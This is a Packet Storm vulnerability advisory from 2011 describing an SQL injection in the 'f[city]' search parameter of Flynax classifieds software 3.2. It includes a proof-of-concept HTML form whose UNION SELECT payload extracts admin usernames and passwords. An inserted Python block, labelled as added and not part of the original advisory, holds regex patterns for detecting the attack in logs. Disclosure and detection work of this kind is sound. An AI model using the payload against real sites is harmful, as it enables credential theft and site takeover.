Flynax SQL Injection

2011-09-27T00:00:00
ID PACKETSTORM:105341
Type packetstorm
Reporter Matias Fontanini
Modified 2011-09-27T00:00:00

Description

                                        
`I. BACKGROUND  
--------------  
  
Flynax is a software development company which produces several CMSs to maintain  
different kinds of classifieds websites.  
  
II. DESCRIPTION  
----------------  
  
Nasel members discovered a critical vulnerability in the front-end of  
these products.  
  
The vulnerability is an SQL injection in the advanced search,  
specifically in the "f[city]" parameter, located in the following files:  
- General Classifieds Software: dealers.html  
- Real Estate Classifieds: agents-realtors.html  
- Auto Classifieds Script: dealers.html  
- Pets Classifieds Software: dealers.html  
  
Exploiting this vulnerability can lead to a full disclosure of the database.  
  
  
III. AFFECTED PRODUCTS  
-----------------------  
  
- General Classifieds Software 3.2  
- Auto Classifieds Script 3.2  
- Real Estate Classifieds 3.2  
- Pets Classifieds Software 3.2  
  
IV. PoC  
------------  
  
<form action="http://site/path/dealers.html" method="post">  
Injection:<input value="') and 1=0 union all select  
1,2,3,4,concat_ws(0x3a, User,  
Pass),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 from  
fl_admins#" name="f[city]" type="text">  
<input type="hidden" name="search" value="true">  
<input type="hidden" value="" name="f[country]">  
<input type="submit" value="Send">  
</form>  
  
The name of the admin users table can differ depending on the product's version.  
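
Added example (not part of the original advisory, and not Flynax or Nasel code): a log-review heuristic in Python that flags POST requests to the pages listed above whose "f[city]" value has the shape shown in the PoC. The rule set, the two-rule alert threshold, the helper names and the sample requests are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlencode, urlsplit

# Pages the advisory lists as carrying the vulnerable advanced search.
AFFECTED_PAGES = {"dealers.html", "agents-realtors.html"}

# Heuristic rules for the f[city] value (assumptions; tune for real traffic).
# The table name is not matched, since the advisory notes it can differ.
RULES = [
    ("quote_paren_breakout", re.compile(r"'\s*\)")),
    ("union_select", re.compile(r"\bunion\b(\s+all)?\s+select\b", re.I)),
    ("trailing_comment", re.compile(r"#|--\s|/\*")),
]

def inspect_request(method, url, body):
    """Return the names of the rules that fire for one logged request."""
    page = urlsplit(url).path.rsplit("/", 1)[-1]
    if method.upper() != "POST" or page not in AFFECTED_PAGES:
        return []
    form = parse_qs(body, keep_blank_values=True)
    hits = []
    for value in form.get("f[city]", []):
        hits += [n for n, rx in RULES if rx.search(value) and n not in hits]
    return hits

def is_suspicious(hits):
    """Alert on two or more rules, so a lone '#' or apostrophe stays quiet."""
    return len(hits) >= 2

def form_body(city):
    """Build a constructed urlencoded body shaped like the search form."""
    return urlencode({"f[city]": city, "search": "true", "f[country]": ""})

# Constructed sample requests (method, URL, body); not real traffic.
SAMPLES = [
    ("POST", "http://site/path/dealers.html", form_body("Buenos Aires")),
    ("POST", "http://site/path/agents-realtors.html", form_body("O'Higgins")),
    ("POST", "http://site/path/dealers.html", form_body("Suite #5")),
    ("POST", "http://site/path/dealers.html",
     form_body("') and 1=0 union all select 1,2,3 from t#")),
    ("GET", "http://site/path/index.html", ""),
]

if __name__ == "__main__":
    for method, url, body in SAMPLES:
        hits = inspect_request(method, url, body)
        print(method, url, hits, "ALERT" if is_suspicious(hits) else "ok")
```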
  
V. CREDITS  
-----------  
  
This vulnerability was found by the Nasel Penetration Testing team formed by:  
- Alessandri, Santiago (salessandri [at] nasel [dot] com [dot] ar)  
- Benencia, Raul (rbenencia [at] nasel [dot] com [dot] ar)  
- Fontanini, Matias (mfontanini [at] nasel [dot] com [dot] ar)  
- Traberg, Carlos Gaston (gtraberg [at] nasel [dot] com [dot] ar)  
  
VI. ADVISORY INFORMATION  
-------------------------  
  
2011-09-15  
==========  
  
Vulnerability Found. Vendor notification. Scheduled advisory release  
on September 25th, 2011.  
  
2011-09-17  
==========  
  
Vendor replied that the problem was fixed.  
  
2011-09-25  
==========  
  
Advisory released.  
  
--   
Nasel Penetration Testing Team  
http://www.nasel.com.ar  
`